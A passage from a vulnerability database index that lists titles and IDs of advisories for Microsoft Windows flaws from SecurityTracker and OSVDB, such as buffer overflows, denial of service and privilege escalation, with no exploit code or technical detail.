Arbitrary Code [1017736] Microsoft Windows Explorer OLE Parsing Bug Lets Users Deny Service [1017641] Microsoft Windows RichEdit OLE Memory Corruption Error Lets Remote Users Execute Arbitrary Code [1017636] Microsoft Windows Defender Integer Overflow in Parsing PDF Files Lets Remote Users Execute Arbitrary Code [1017441] Microsoft Windows Workstation Service Memory Allocation Error in NetrWkstaUserEnum() Lets Remote Users Deny Service [1017369] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Book Files Let Remote Users Execute Arbitrary Code [1017168] Microsoft Windows Kernel GDI Data Structure Processing Bug Lets Local Users Gain Elevated Privileges [1016941] Microsoft Windows Shell Integer Overflow Lets Remote Users Execute Arbitrary Code [1016388] Microsoft Windows Explorer Lets Remote Users Access Information in Other Domains and Execute HTA Applications [1016339] Microsoft Windows 'hlink.dll' Buffer Overflow in Processing Hyperlinks Lets Remote Users Execute Arbitrary Code [1016292] Microsoft Windows Buffer Overflow in AOL ART Image Rendering Library Lets Remote Users Execute Arbitrary Code [1016290] Microsoft Windows Buffer Overflow in TCP/IP Stack Lets Remote Users Execute Arbitrary Code [1016289] Microsoft RPC Mutual Authentication Bug Lets Remote Users Spoof Other Systems [1016286] Microsoft Windows 98 Graphics Rendering Engine Buffer Overflow in Processing WMF Images Lets Remote Users Execute Arbitrary Code [1016285] Windows Routing and Remote Access Service RPC Buffer Overflows Let Remote Users Execute Arbitrary Code [1015898] Microsoft Outlook Express Buffer Overflow in Processing Windows Address Books Lets Remote Users Execute Arbitrary Code [1015897] Microsoft Windows Explorer COM Object Bug Lets Remote Users Execute Arbitrary Code [1015765] Microsoft Windows Services Have Unsafe Default ACLs That Let Remote Authenticated Users Gain Elevated Privileges [1015630] Microsoft Windows Web Client Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1015629] Microsoft Windows IGMP Processing Bug Lets Remote Users Deny Service [1015595] Microsoft Windows UPnP/NetBT/SCardSvr/SSDP Services May Be Incorrectly Configured By 3rd Party Applications, Allowing Local Users to Gain Elevated Privileges [1015459] Microsoft Windows Embedded Web Fonts Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015453] Microsoft Windows Graphics Rendering Engine WMF File Memory Access Error Lets Remote Users Execute Arbitrary Code [1015416] Microsoft Windows Unspecified WMF Rendering Bug Lets Remote Users Execute Arbitrary Code [1015349] Microsoft Windows Internet Explorer May Let Remote Users Obfuscate the Download Dialog Box [1015347] Microsoft Windows 2000 Kernel APC Queue Bug Lets Local Users Gain Elevated Privileges [1015168] Microsoft Windows Buffer Overflows in Graphics Rendering Engine Lets Remote Users Execute Arbitrary Code [1015049] Microsoft Internet Explorer Drag-and-Drop Timing May Let Remote Users Install Arbitrary Files [1015044] Microsoft Windows Multiple COM Objects Let Remote Users Execute Arbitrary Code [1015042] Microsoft Windows Plug and Play Buffer Overflow Lets Remote Users Execute Arbitrary Code [1015040] Microsoft Windows Shell Bugs in Processing '.lnk' Files and in Web View Preview Mode Lets Remote Users Execute Arbitrary Code [1015039] Microsoft Windows Buffer Overflow in Collaboration Data Objects Lets Remote Users Execute Arbitrary Code [1015037] Microsoft Windows Buffer Overflows in MSDTC and COM+ Let Remote Users Execute Arbitrary Code and Local User Gain Elevated Privileges [1015036] Microsoft Windows FTP Client Input Validation Hole Lets Remote Servers Create/Overwrite Files on the Target User's System [1014829] Microsoft Windows Firewall User Interface May Not Properly Display Exception Rules [1014642] Microsoft Windows Kerberos and PKINIT Vulnerabilities Allow Denial of Service, Information Disclosure, and Spoofing [1014640] Microsoft Windows Plug and Play Stack Overflow Lets Remote Users Execute Arbitrary Code [1014639] Microsoft Windows Telephony Service Remote Code Execution or Local Privilege Escalation [1014638] Microsoft Windows Print Spooler Service Buffer Overflow Lets Remote Users Execute Arbitrary Code [1014498] Microsoft Windows Remote Desktop Protocol Bug Lets Remote Users Deny Service [1014198] Microsoft Windows Buffer Overflow in Processing Server Message Block Packets Lets Remote Users Execute Arbitrary Code [1014196] Microsoft Windows Buffer Overflow in Web Client Service Lets Remote Authenticated Users Execute Arbitrary Code [1013761] Microsoft Windows Explorer 'webvw.dll' Input Validation Error Lets Remote Users Execute Arbitrary Scripting Code [1013689] Microsoft Windows Shell MSHTA Lets Remote Users Code Execute Arbitrary Scripting Code [1013688] Microsoft Windows Kernel and Font Buffer Overflows Let Local Users Deny Service or Obtain System Privileges [1013686] Microsoft Windows TCP, IP, and ICMP Processing Errors Let Remote Users Deny Service and Execute Arbitrary Code [1013552] Microsoft Windows Remote Desktop 'TSShutdn.exe' Lets Remote Authenticated Users Shutdown the System [1013284] Microsoft Windows 2000 and XP Group Policy Can Be Bypassed By Microsoft Office Applications and By Flash Drives [1013120] Microsoft Windows OLE Buffer Overflow Lets Remote Users Execute Arbitrary Code and COM Access Flaw Lets Remote Authenticated Users Gain Elevated Privileges [1013119] Microsoft Windows Hyperlink Object Library Lets Remote Users Execute Arbitrary Code [1013117] Microsoft Windows License Logging Service Lets Remote Users Execute Arbitrary Code [1013115] Microsoft Windows Media Player Buffer Overflow in Processing PNG Files Lets Remote Users Execute Arbitrary Code [1013114] Microsoft Windows SMB Lets Remote Users Execute Arbitrary Code [1013112] Microsoft Windows XP Named Pipe Validation Error Lets Remote Users Obtain Information [1012891] Microsoft IE Windows XP SP2 File Download Security Can Be Bypassed With Dynamic IFRAME Tag [1012684] Microsoft Windows LoadImage API Buffer Overflow Lets Remote Users Execute Arbitrary Code [1012683] Microsoft Windows ANI File Parsing Errors Let Remote Users Deny Service [1012682] Microsoft Windows Help System Buffer Overflows in Processing Phrase Compressed Help Files Lets Remote Users Execute Arbitrary Code [1012626] Microsoft Windows Media Player setItemInfo Lets Remote Users Execute Arbitrary Code [1012515] Microsoft Windows NT 4.0 Buffer Overflows in the Logging and Processing of DHCP Packets May Let Remote Users Execute Arbitrary Code [1012513] Microsoft Windows Kernel Buffer Overflow in Processing Local Procedure Call Messages Lets Local Users Gain System Privileges [1012458] Microsoft Internet Explorer Lets Remote Users Inject Content into Open Windows [1012435] Microsoft Windows Resource Kit Buffer Overflow and Input Validation Holes in 'w3who.dll' May Permit Remote Code Execution and Cross-Site Scripting Attacks [1011940] Microsoft Remote Desktop on Windows XP Lets Remote Authenticated Users Restart the System [1011880] Microsoft Windows XP Error in Explorer in Processing WAV Files Lets Remote Users Deny Service [1011859] Microsoft Internet Explorer on Windows XP Fails to Restrict Drag and Drop Operations When Configured to Disable These Operations [1011647] Microsoft Windows Shell Buffer Overflows Let Remote Users Execute Arbitrary Code [1011637] Microsoft Windows Buffer Overflow in Processing Compressed Folders Lets Remote Users Execute Arbitrary Code [1011632] Microsoft NT RPC Runtime Library Buffer Overflow Lets Remote Users Deny Service [1010996] Microsoft Windows XP SP2 Local Computer Scripting Restrictions Can Be Bypassed With a Specially Crafted MHT File [1010959] Microsoft Windows Explorer (in XP SP2) May Fail to Warn Users When Executing Untrusted Files [1010688] Microsoft Windows Task Scheduler Buffer Overflow Lets Remote Users Execute Arbitrary Code [1010687] Microsoft Windows 2000/NT POSIX Subsystem Buffer Overflow Lets Local Users Gain Elevated Privileges [1010352] Microsoft Windows 2000 Domains With Eight Characters May Let Remote Users With Expired Passwords Login [1010314] Microsoft Windows IPSec Filtering Can Be Bypassed By Remote Users [1009940] Microsoft Windows Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009776] Microsoft Windows Kernel Local Descriptor Table Flaw Lets Local Users Gain Elevated Privileges [1009771] Microsoft Windows Negotiate Security Software Provider (SSP) Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code [1009770] Microsoft Windows Management Interface Provider Lets Local Users Gain Elevated Privileges [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1009761] Microsoft Windows COM Object Identifier Creation Flaw May Let Remote Users Cause Applications to Open Network Ports [1009758] Microsoft Windows RCP Memory Leak Lets Remote Users Deny Service [1009673] Microsoft Windows XP 'mswebdvd.dll' Buffer Overflow Lets Remote Users Deny Service [1009359] Microsoft Windows Media Services Can Be Crashed By Remote Users [1009181] Microsoft Windows Explorer Heap Overflow in Processing '.emf' Files Permits Code Execution [1009008] Microsoft Windows Internet Naming Service (WINS) Length Validation Flaw Lets Remote Users Deny Service [1008699] Microsoft Windows Buffer Overflow in MDAC Lets Remote Users Execute Arbitrary Code [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1008146] Microsoft Windows Workstation Service (wkssvc.dll) Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Privileges [1007933] Microsoft Windows Messenger Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With Local System Privileges [1007932] Microsoft Windows Troubleshooter ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1007874] Microsoft Windows OS PostThreadMessage() API Permits Local Users to Terminate Processes That Have Message Queues [1007615] Microsoft Windows NetBIOS Name Service May Disclose Memory Contents to Remote Users [1007281] Microsoft Windows NT File Management Flaw May Let Remote Users Crash Certain Applications [1007214] Microsoft Windows XP Shell Buffer Overflow in Processing Folder Display Attributes Permits Remote Code Execution [1007152] Microsoft Windows 2000 Accessibility Utility Manager Lets Local Users Gain Elevated Privileges [1007099] Microsoft Windows 2000 ShellExecute() Buffer Overflow May Let Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1007059] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Has Another Buffer Overflow That Lets Remote Execute Arbitrary Code [1007057] Microsoft Windows Media Player Access Control Flaw Lets Remote Users View, Modify, and Delete Media Library Metadata [1006959] Microsoft Windows Server 2003 Drivers May Leak Information From Memory Via Ethernet Packets Containing TCP Streams [1006866] Microsoft Windows Media Services (nsiislog.dll) Extension to Internet Information Server (IIS) Lets Remote Execute Arbitrary Code [1006803] Microsoft Windows Can Be Crashed By Remote Users via Malformed NetMeeting URLs [1006588] Microsoft Windows OS Kernel Messaging Buffer Overflow Lets Local Users Gain Full Control of the System [1006580] Microsoft Windows 2003 'win2k.sys' Printing Bug Lets Users Crash the System [1006532] Microsoft Windows VM Input Validation Flaw in ByteCode Verifier Lets Malicious Java Applets Execute Arbitrary Code [1006447] Microsoft Windows Terminal Services RDP Implementation Does Not Validate Server Identity, Allowing Man-in-the-Middle Attacks [1006323] Microsoft Windows Buffer Overflow in Windows Script Engine JScript.DLL Lets Remote Users Execute Arbitrary Code [1006286] Microsoft Windows 2000/XP PostMessage() API Flaw May Let Local Users Grab Passwords from Local Dialog Boxes [1006179] Microsoft Windows Me Help and Support Center URL Handler Overflow Lets Remote Users Execute Arbitrary Code [1006121] Microsoft Windows 'riched20.DLL' Buffer Overflow May Let Remote Users Crash Applications [1006045] Microsoft Windows XP Redirector Buffer Overflow May Let Local Users Gain System Level Privileges [1005986] Microsoft Windows Terminal Server MSGINA.DLL Flaw Lets Remote Authenticated Users Reboot the Server [1005859] Microsoft Windows File Protection Mechanism Weakness in Trusting Code-Signing Certificate Chains Lets Arbitrary Remote Users Sign Code That Will Be Trusted By Windows [1005858] Microsoft Windows File Protection Weakness May Let Local Users Replace Code With Previous Vulnerable Versions Without Detection [1005833] Microsoft Windows XP Shell Buffer Overflow in Processing Audio Files Allows Remote Users to Execute Arbitrary Code [1005799] Microsoft Windows OS Bug in Processing WM_TIMER Messages May Let Local Users Gain Elevated Privileges [1005761] Microsoft Windows XP Wireless LAN Support May Disclose Access Point Information to Remote Users [1005454] Microsoft Windows Media Player for Solaris Uses Unsafe Default Permissions [1005343] Microsoft Windows Help System Bug in Processing Compiled HTML Help Files Lets Remote Users Execute Arbitrary Commands in the Local Computer Security Zone [1005336] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Files to Be Created [1005335] Microsoft Windows Operating System Compressed Folders Allow Arbitrary Code to Be Executed [1005332] Microsoft Windows Help System Buffer Overflow in 'hhctrl.ocx' Lets Remote Users Execute Arbitrary Code [1005256] (Vendor Issues Fix) Microsoft Windows XP Remote Desktop Implementation Bug Lets Remote Users Crash the Operating System [1005242] Microsoft Windows XP Remote Desktop Can Be Crashed By Remote Users Sending a Modified RDP Packet [1005150] Microsoft Windows Operating System Certificate Enrollment ActiveX Control Allows Remote Users to Delete Certificates on a Target User's System [1005108] Microsoft Windows Media Player Allows Malicious Windows Media Download (.wmd) Files to Silently Create Files in a Known Location and Execute Them [1005070] Microsoft Internet Explorer (IE) Browser Error Message Processing Allows Remote Users to Execute Arbitrary Code on Certain Windows 98 Platforms [1005068] Microsoft NTFS Filesystem in Windows NT and Windows 2000 Has Auditing Hole That Lets Local Users Access Files Without the File Access Being Audited [1005063] Microsoft Windows XP Help and Support Center Hole Lets Remote Users Create URLs That, When Loaded, Will Delete Arbitrary Files on Your System [1004441] Microsoft Windows Help System Buffer Overflows in 'htctrl.ocx' ActiveX Control May Let Remote Users Execute Arbitrary Code on a Target User's Computer By Sending Malicious HTML [1004357] Microsoft Windows Debugging Facility for Windows NT4 and 2000 Has Authentication Hole That Lets Local Users Execute Arbitrary Code with SYSTEM Privileges [1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition [1004083] Microsoft Windows 2000 'microsoft-ds' Service Flaw Allows Remote Users to Create Denial of Service Conditions By Sending Malformed Packets [1004022] Microsoft Windows 2000 Group Policy Object Enforcement Can Be Circumvented if User License Limits are Exceeded [1003975] Microsoft Windows NT, 2000, and XP Kernel Buffer Overflow in Processing Multiple UNC Provider (MUP) Requests May Let Local Users Obtain System Level Privileges [1003949] Microsoft Windows 2000 DCOM Implementation Flaw May Disclose Memory Contents to Remote Users [1003816] Microsoft Windows 2000 Automatic Log Off Policy Fails to Expire Sessions in Progress [1003764] Microsoft Windows Operating System Shell URL Handler Bug Lets Remote Users Create HTML That Could Cause Arbitrary Code to Be Executed on Another User's System in Certain Situations [1003687] Microsoft Windows 2000 and Windows XP SMTP Service Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003686] Microsoft Windows SMTP Service Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003633] Microsoft XML Core Services in Microsoft Windows XP Operating System Lets Remote Scripts Access and Send Local Files [1003591] Microsoft Windows Terminal Services May Cause the System's Screen Saver Lockout Mechanism to Fail in Certain Situations [1003472] Microsoft Telnet Server for Windows 2000 and for Interix Has a Buffer Overflow That May Let Remote Users Execute Code on the Server with System Level Privileges [1003402] Microsoft Windows NT 4.0 and Windows 2000 Domain Controllers May Give Elevated Privileges to Remote Users Who Are Valid Administrators on Other Trusted Domains [1003369] PGPfire Personal Firewall for Microsoft Windows Discloses Identifying Information to Remote Users [1003310] Microsoft Windows NT/2000 Authentication Lockout Bug May Record Successful Logins as Failed Login Attempts in Certain Situations [1003308] Microsoft Windows XP Manifest Processing Bug Lets Local Users Corrupt the System and Cause the Boot Process to Fail [1003257] Microsoft Windows XP Upgrade Effectively Removes Patches from Internet Explorer (IE) During Upgrade, Leaving Users Exposed to IE Vulnerabilities [1003239] Python Language Implementation on Microsoft Windows Allows a Remote Server to Access Files on a Web Surfing User's PC [1003228] Microsoft Windows Media Player Discloses Unique ID to Remote Users in the Default Configuration, Allowing Web Sites to Track Users [1003221] Microsoft Internet Explorer (IE) Default Configuration Allows HTML-based Scripts to Access Your Windows Clipboard Contents [1003201] Microsoft Windows 95 Backup Utility Has Buffer Overflow That Could Cause Denial of Service Conditions [1003121] Microsoft Windows XP Task Manager Will Not Kill Certain Processes [1003041] Microsoft Windows XP Remote Desktop Client May Disclose Recently Used Account Names to Remote Users [1003028] Microsoft Windows Universal Plug and Play Component Buffer Overflow Gives Remote Users System Level Access to Windows XP and 98/ME Hosts [1003003] Microsoft Windows XP Hot Key Function Lets Physically Local Users Execute Administrator Hot Key Functions in Certain Situations [1002979] Microsoft Windows Explorer Discloses Stored FTP Passwords to Local Users [1002926] Microsoft Windows Operating System File Locking Design May Allow Local Users to Block Group Policy Scripts [1002922] Microsoft Windows 2000 Internet Key Exchange (IKE) Service Can Be Crashed By Remote Users [1002754] Terminal Services on Microsoft Windows 2000 and XP Allow Remote Users to Log Bogus IP Addresses Instead of the User's Genuine Address [1002731] Microsoft Windows 2000 RunAs Service May Disclose Authentication Credentials to Local Users [1002730] Microsoft Windows 2000 RunAs Utility May Disclose Sensitive Information to Local Users [1002729] Microsoft Windows 2000 RunAs Service Allows Local Users to Disable the Service [1002601] Microsoft Windows Me Universal Plug and Play (UPnP) Ssdpsrv.exe Server Component Can Be Crashed by Remote Users [1002519] TYPSoft FTP Server for Microsoft Windows Can Be Crashed by Remote Users [1002418] Counterpane's Password Safe Password Encryption Utility for Microsoft Windows May Disclose Passwords to Local Users in Certain Situations [1002201] Microsoft Windows TCP/IP Stack Vulnerable to a Certain Man-in-the-Middle Denial of Service Attack [1002197] Microsoft Windows NNTP Network News Service Has a Memory Leak That Allows Remote Users to Cause the Server to Crash [1002124] Microsoft Windows 98 Operating System Can Be Crashed When Running a Web Server or Other Servers And the AUX Device is Accessed By the Program [1002105] Microsoft SQL Database Server RPC Input Validation Failure Lets Remote Users Crash the Database Service [1002104] Microsoft Exchange Server RPC Input Validation Failure Lets Remote Users Crash the Exchange Service [1002099] Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users [1002098] Windows Terminal Services in Microsoft Windows 2000 and NT 4.0 Can Be Crashed By Remote Users Due to a Memory Leak [1001993] Microsoft Windows 2000, Linux 2.4, NetBSD, FreeBSD, and OpenBSD May Let Remote Users Affect TCP Performance [1001992] Microsoft Windows NT Lets Remote Users Cause Increased Packet Overhead and Increased CPU Resource Consumption [1001931] Microsoft Windows 2000 SMTP Service May Allow Unauthorized Remote Users to Relay E-mail via the Service [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL [1001701] Microsoft Windows 2000 Telnet Server Allows Local Users to Gain System-Level Privileges and Lets Remote Users Crash the Server [1001605] Microsoft Windows 2000 Allows Local Users to Elevate Privileges [1001603] Microsoft Windows Media Player May Allow Remote Users to Execute Code Contained in Internet Shortcuts and View Files on the Media Player's Host [1001587] Microsoft Word for Windows and for Mac May Run Macros Linked By RTF Documents Without Warning [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001513] Microsoft Windows 2000 Indexing Service Allows Remote Users to View Include Programming Files [1001501] Microsoft Windows 2000 Domain Controllers Can Be Effectively Halted By Remote Users [1001467] Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System [1001464] Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server [1001360] Microsoft Windows Operating System DLL May Allow Malicious Remote Scripts to Run Code on the User's Host Without the User's Intervention [1001240] Microsoft FTP Client for Windows 2000 Still Vulnerable to Executing Arbitrary Code in Limited Situations [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords [1001110] A Microsoft German-Language Hotfix for Windows NT 4 Incorrectly Displays Some Security Events as Other Security Events OSVDB - http://www.osvdb.org: [96194] Microsoft Windows Asynchronous RPC Request Handling Remote Code Execution [83796] Microsoft Windows DCOM RPCSS.exe Local Privilege Escalation [69819] Microsoft Windows Netlogon RPC Service Crafted Request Remote DoS [68586] Microsoft Windows LRPC Server LPC Message Handling Local Privilege Escalation [68532] Microsoft Windows rpcrt4.dll LRPC_SCALL::SendRequest() Function LPC Message Local Overflow DoS [67988] Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution [67981] Microsoft Windows RPC Response Processing Remote Memory Corruption [59855] Microsoft Windows License Logging Server (llssrv.exe) RPC LlsrLicenseRequestW Method Remote Overflow [59819] Microsoft Windows RPC Session Handle Hijacking Remote Privilege Escalation [54936] Microsoft Windows RPC Marshalling Engine Internal State Manipulation Remote Code Execution [54934] Microsoft Windows Print Spooler Load Library Crafted RPC Message Arbitrary DLL Loading Privilege Escalation [53667] Microsoft Windows RPCSS Service Isolation Local Privilege Escalation [49243] Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution [49060] Microsoft Windows Message Queuing Service RPC Request Handling Remote Code Execution [37629] Microsoft Windows 2000 RPC Authentication Unspecified Information Disclosure [37628] Microsoft Windows 2000 RPC Authentication Crafted Request Remote DoS [34100] Microsoft Windows DNS RPC Interface Zone Name Remote Overflow [32445] Microsoft Windows Workstation Service NetrWkstaUserEnum RPC Request DoS [30823] Microsoft Windows Print Spooler (spoolsv.exe) RpcGetPrinterData Function DoS [27845] Microsoft Windows Server Service Crafted RPC Message Remote Overflow [26438] Microsoft Windows RPC Mutual Authentication Server Spoofing [26436] Microsoft Windows RASMAN RPC Request Remote Overflow [25335] Microsoft Windows Distributed Transaction Coordinator (DTC) CRpcIoManagerServer::BuildContext Function Remote Overflow [17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure [17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration [13414] Microsoft Windows RPC Endpoint Manager Malformed Packet Remote DoS [13020] Microsoft Windows XP RPC Cache Memory Leak [11797] Microsoft Windows DCOM RPCSS Service DCERPC Packet Overflow [11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation [11265] Microsoft Windows NT Malformed RPC Packet Error Message Loop DoS (snork) [11159] Microsoft Windows NT Invalid RPC Named Pipe Saturation DoS [10686] Microsoft Windows NT RPC Library Arbitrary Memory Manipulation [7117] Microsoft Windows RPC Locator Remote Overflow [5247] Microsoft Windows DCOM RPC Object Identity Information Disclosure [5246] Microsoft Windows CIS/RPC Over HTTP DoS [5245] Microsoft Windows RPCSS Large Length Field DoS [2670] Microsoft Windows RPC Race Condition DoS [2535] Microsoft Windows DCOM RPCSS Service Filename Parameter Overflow [2100] Microsoft Windows RPC DCOM Interface Overflow [1095] Microsoft Windows NT RPC Locator (RPCSS.EXE) CPU Utilization DoS [673] Microsoft Windows NT RPC Endpoint Mapper Malformed Request DoS [408] Microsoft Windows Malformed DCE/RPC SMBwriteX Request DoS [398] Microsoft Windows 2000 Malformed RPC Traffic Local Security Policy Corruption DoS [96197] Microsoft Windows TCP/IP Stack Crafted ICMPv6 Packet Handling Remote DoS [96195] Microsoft Windows NAT Driver Crafted ICMP Packet Handling Remote Memory Corruption DoS [96193] Microsoft Windows Unicode Scripts Processor (USP10.DLL) Uniscribe Font Parsing Engine Unspecified Memory Corruption [96180] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3196) [96179] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3197) [96178] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3198) [95667] Microsoft Windows XP Wireless Preferred Network List (PNL) Remote Disclosure [95589] Microsoft Windows Mobile Wireless Preferred Network List (PNL) Remote Disclosure [94987] Microsoft Windows Defender Improper Pathname Handling Local Privilege Escalation [94986] Microsoft Windows Media Format Runtime Media File Handling Arbitrary Code Execution [94985] Microsoft Windows DirectShow GIF File Handling Memory Overwrite Arbitrary Code Execution [94966] Microsoft Windows win32k.sys Memory Object Dereference Handling Local Privilege Escalation [94965] Microsoft Windows win32k.sys Memory Object Allocation Handling Local Privilege Escalation [94964] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [94963] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow DoS [94962] Microsoft Windows win32k.sys Memory Object Handling Local Information Disclosure [94961] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [94126] Microsoft Windows Print Spooler Printer Deletion Memory Handling Local Privilege Escalation [94125] Microsoft Windows TCP/IP Driver TCP Connection Crafted Packet Handling Remote Integer Overflow DoS [94124] Microsoft Windows Kernel Page Fault System Call Handling Local Information Disclosure [93539] Microsoft Windows win32k.sys EPATHOBJ::pprFlattenRec / EPATHOBJ::bFlatten Functions Local Privilege Escalation [93320] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [93319] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [93318] Microsoft Windows DirectX Graphics Kernel Subsystem (dxgkrnl.sys) Memory Object Handling Local Privilege Escalation [93317] Microsoft Windows Essentials Windows Writer Crafted URL Handling Arbitrary File Overwrite [93300] Microsoft Windows HTTP Protocol Stack (HTTP.sys) Crafted HTTP Header Handling Infinite Loop Remote DoS [92133] Microsoft Windows NTFS NULL Pointer Dereference Local Privilege Escalation [92132] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1292) [92131] Microsoft Windows win32k.sys Crafted Font File Handling DoS [92130] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1283) [92127] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unspecified Local Memory Corruption [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [92125] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1294) [92124] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1284) [92122] Microsoft Windows Remote Desktop Client ActiveX (mstscax.dll) Use-after-free Arbitrary Code Execution [91696] Microsoft Windows Modern Mail Unspecified Spoofing Weakness [91269] Microsoft Windows 8 TrueType Font (TTF) Handling Unspecified DoS [91195] Microsoft Windows 7 Unspecified ASLR Protection Mechanism Bypass [91194] Microsoft Windows 7 Kernel Unspecified Local Privilege Escalation (pwn2own) [91193] Microsoft Windows 7 Unspecified ASLR / DEP Protection Mechanism Bypass (pwn2own) [91157] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1287) [91156] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1286) [91155] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1285) [90257] Microsoft Windows Server 2003 ICACLS.EXE Permission Inheritance Weakness [90236] Microsoft Windows ZwSetInformationProcess() Function Process Priority Handling Local DoS [90166] Microsoft Windows Object Linking and Embedding (OLE) Automation Memory Allocation RTF File Handling Arbitrary Code Execution [90165] Microsoft Windows Win32.sys CSRSS Memory Object Handling Local Privilege Escalation [90164] Microsoft Windows TCP/IP Stack Crafted Connection Termination Packet (TCP PIN WAIT) Handling Remote DoS [90163] Microsoft Windows Memory Object Reference Count Handling Local Privilege Escalation [90162] Microsoft Windows Memory Object Handling Local Privilege Escalation (2013-1279) [90161] Microsoft Windows ApphelpCacheLookupEntry Function Memory Object Handling Local Privilege Escalation [90160] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1277) [90159] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1276) [90158] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1275) [90157] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1274) [90156] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1273) [90155] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1272) [90154] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1271) [90153] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1270) [90152] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1269) [90151] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1268) [90150] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1267) [90149] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1266) [90148] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1265) [90147] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1264) [90146] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1263) [90145] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1262) [90144] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1261) [90143] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1260) [90142] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1259) [90141] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1258) [90140] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1257) [90139] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1256) [90138] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1255) [90137] Microsoft Windows win32k.sys SfnINOUTSTYLECHANGE Function Memory Object Handling Local Privilege Escalation [90136] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1253) [90135] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1252) [90134] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1251) [90133] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1250) [90132] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1249) [90131] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1248) [90130] Microsoft .NET Framework Windows Form Object Creation Callback Function Arbitrary Code Execution [90129] Microsoft Windows NFS Server Read-only Share File Operation Handling Remote DoS [90128] Microsoft 